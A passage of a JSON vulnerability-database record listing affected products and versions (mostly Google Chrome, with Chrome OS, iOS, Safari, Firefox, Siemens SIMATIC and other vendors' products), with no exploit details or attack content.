"version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.694.0" }, { "model": "bactec", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "90500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.669.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "simatic s7-1500 software controller", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0.2526.80" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.3" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.190.2" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "39.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.400.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.592.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.902.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.39" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.15" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.548.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.640.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.23" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.020" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.18" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.103" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.759.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.4" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.84" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "49.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.4" }, { "model": "safari", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "11.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.69" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16" }, { "model": "simatic ipc677d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.662.0" }, { "model": "iphone", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.833.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.810.0" }, { "model": "simotion p320-4e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.41" }, { "model": "nexus 6p", "scope": null, "trust": 0.3, "vendor": "google", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.649.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.316.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.692.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.17" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "13.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.83" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.17" }, { "model": "enterprise linux for power big endian", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.93" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.630.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.885.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.569.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.89" }, { "model": "simatic itp3000", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "v20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.962.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.295.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.318.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.619.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.14" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1004" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.100" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "57.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1033" }, { "model": "simatic ipc627c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1044" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1679.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3112.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.70" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.51" }, { "model": "enterprise linux for scientific computing", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.539.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.91" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.474.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.110" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.1" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.883.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.306" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.62" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.348.0" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.2" }, { "model": "windows server r2 for itanium-based systems sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "20.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.120" }, { "model": "simatic itp1000", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.705.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1016.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.395.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.118" }, { "model": "ruggedcom rx1400 vpe", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.72" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1075.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.24" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "43.0.2357.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.443.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.107" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96379" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.217" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.900.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1074.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.126" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.19" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.1" }, { "model": "chrome", "scope": "eq", "trust": 